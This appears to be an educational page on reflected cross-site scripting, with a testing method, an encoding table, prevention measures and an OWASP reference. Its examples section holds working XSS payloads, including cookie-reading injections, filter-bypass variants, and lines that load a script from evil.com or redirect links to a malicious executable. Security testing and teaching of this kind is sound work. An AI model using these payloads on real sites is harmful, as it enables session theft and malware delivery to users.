Reflected XSS occurs when an attacker injects malicious Javascript code that is directly reflected to the victim's browser. This is the most common type of XSS found in the wild.

Testing Methodology

  • Determine input vectors. Including HTTP parameters, POST data, hidden form fields, and pre-defined ratio or selection values.
  • Test each input with specially crafted input data to determine if input field is vulnerable.
  • Analyse the testing result and determine if it represents a vulnerability with a realistic impact on the page. This is done by examining the resulting HTML and searching for the test input. Once found, the tester identifies any characters that were not properly encoded or filtered out.

The key HTML entities which should be encoded or filtered out are:

Character HTML entity Description
> > Greater than
< &lt; Less than
& &amp; Ampersand
' &apos; Single quote
" &quot; Double quote
\n   New line
\r   Carriage return
\   Backslash
\uXXXX   Unicode values

Examples

Reflect 'message' query parameter directly to page

http://vulnapp.com/index.php?message=<script>alert(1)</script>
http://vulnapp.com/index.php?message=<script>window.onload = function() { var AllLinks=document.getElementsByTagName("a");AllLinks[0].href = "http://evil.com/malicious.exe";}</script>

Inject HTML tag attribute values

<input type="text" name="state" value="INPUT_FROM_USER">

An attacker could inject the following code

" onfocus="alert(document.cookie)

Different syntax, encoding or non-recursive filters

"><script >alert(document.cookie)</script >

"><ScRiPt>alert(document.cookie)</ScRiPt>

"%3cscript%3ealert(document.cookie)%3c/script%3e

<scr<script>ipt>alert(document.cookie)</script>

Include external scripts

<script src="http://evil.com/xss.js"></script>

Preventing reflected XSS

  1. Input sanitisation
    1. Rejecting input by returning an error
    2. Filter out invalid input
  2. Web application firewall rules to block malicious input
  3. Mechanisms embedded in modern web browsers
  4. Securing cookies to reduce attack vector for session hijacking

References

  1. OWASP. Testing for Reflected Cross Site Scripting. https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting